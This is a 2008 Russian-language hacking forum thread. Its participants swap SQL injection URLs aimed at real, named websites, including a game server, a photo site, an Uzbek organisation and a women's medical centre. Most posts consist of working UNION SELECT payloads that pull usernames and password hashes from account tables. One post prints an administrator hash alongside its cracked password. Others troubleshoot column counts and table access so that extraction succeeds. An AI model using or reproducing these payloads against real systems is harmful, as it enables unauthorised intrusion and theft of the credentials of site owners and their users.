16.06.2008, 02:13
|
|
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами:
9479722
Репутация:
-1
|
|
а в нём http://wow.alania.net/ такое проканает?
|
|
|
16.06.2008, 02:21
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
Проканает 
http://wow.alania.net/gilds.php?guid=-3+union+select+1,version(),3,4,5,6,7,8,9,10,11,12/* |
|
|
|
16.06.2008, 02:24
|
|
Новичок
Регистрация: 07.05.2008
Сообщений: 9
С нами:
9479722
Репутация:
-1
|
|
значит сейчас нада писать вот так
http://wow.alania.net/gilds.php?guid=-3+union+select+111,222,username,user_password/*
|
|
|
|
16.06.2008, 02:27
|
|
Участник форума
Регистрация: 12.01.2007
Сообщений: 262
С нами:
10172486
Репутация:
874
|
|
Сейчас нужно идти вот сюда
http://forum.antichat.ru/showthread.php?t=19605
и ЧИТАТЬ ЧИТАТЬ ЧИТАТЬ
а иначе всегда будут подобные вопросы.... вот чесно, сам подумай ОТКУДА ТЫ взял что там есть эти поля и ИЗ КАКОЙ таблицы ты выводишь 
Удачи! |
|
|
|
16.06.2008, 02:30
|
|
Members of Antichat - Level 5
Регистрация: 24.11.2006
Сообщений: 927
С нами:
10243046
Репутация:
3033
|
|
Давайте все-таки в этой теме задавать вопросы, а не бредовать на тему сделайте мне скуль иньекцию. Здесь могут помочь в нестандартном\непонятном случае, но забивать тему элементарными вопросами сто раз расписанными в статьях не стоит. Буду удалять
__________________
Дети индиго - это бездари, не надо песен! В пять лет едва говорить начинают, мы в этом возрасте стихи наизусть читали!
з.ы http://www.youtube.com/watch?v=sNsQe0KByRY Я ПлакалЪ
|
|
|
|
16.06.2008, 03:13
|
|
Познавший АНТИЧАТ
Регистрация: 09.06.2006
Сообщений: 1,359
С нами:
10485026
Репутация:
1879
|
|
_http://wow.alania.net/gilds.php?guid=-3+union+select+1,concat_ws(0x3a,username,sha_pass_ hash),3,4,5,6,7,8,9,10,11,12+from+realmd.account+l imit+0,1/*
Константинэ... только не ругай меня...
P.S Не могу уснуть...
Последний раз редактировалось Ch3ck; 16.06.2008 в 03:15..
|
|
|
|
16.06.2008, 06:50
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
JoN.SmiT не падай в минуса..) читай ману.
еще чтот разкрутил..
http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,password))),5,6+from+u65735.be_users/*
administrator:d9d1b168eac8f197e0576b56cfc23ece => gfhjkm
http://www.modvlad.ru/photo/?g=-1+union+select+1,2,3,unhex(hex(concat_ws(0x3a,user name,password))),5,6+from+u65735.fe_users/*
administrator;password
Есть скуля в поле login, как получить аутпут?)
http://www.rusrek.com/ru/weather/?login=1'+union+select+1/*&password=default
Последний раз редактировалось sabe; 16.06.2008 в 07:08..
|
|
|
|
16.06.2008, 07:25
|
|
Постоянный
Регистрация: 07.11.2007
Сообщений: 392
С нами:
9741777
Репутация:
100
|
|
http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+order+by+1/*
- здесь 1 колонка
http://www.rciscc.uz/rarticles.php?section[id]=-99999999'+union+select+1/* - а тут пишет
Query failed: The used SELECT statements have a different number of columns
- в чем проблема? В неправильных количествах колонок? Их всего одна
Хм..странно.
Вот тут все нормально сработало:
http://www.rciscc.uz/news.php?id=110'+union+select+1,2,3,user(),5,6,7/*
Последний раз редактировалось Ershik; 16.06.2008 в 07:27..
|
|
|
|
16.06.2008, 07:30
|
|
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
С нами:
9454841
Репутация:
504
|
|
в общем есть скуль:
Код:
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(column_name,0x3c2f62723e)+from+information_schema.columns+where+table_name='user'/*
но при попытке просмотра таблицы
Код:
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat_ws(0x3a3a,login,password,email,0x3c2f62723e)+from+medsunr_mifegyn.user/*
мы ничего не получаем (точнее получаем ошибку) следовательно доступ к стаблице закрыт? или я что то не так делаю... |
|
|
|
16.06.2008, 08:46
|
|
Познающий
Регистрация: 22.04.2008
Сообщений: 32
С нами:
9501269
Репутация:
56
|
|
Это обычная таблица (не VIEW), т.ч. фильтрации вывода нет.
Записей в ней нет.
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,concat(TABLE_NAME,'-',TABLE_TYPE,'-',TABLE_ROWS,0x3c2f62723e)+from+INFORMATION_SCHEMA .TABLES/*
Хотя можно посмотреть и так.
http://www.women-medcenter.ru/index.phtml?id=-259'+union+select+1,COUNT(*)+from+medsunr_mifegyn. user/*
Если бы небыло прав, то показало бы ошибку.
Последний раз редактировалось z3r0cool; 16.06.2008 в 08:49..
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
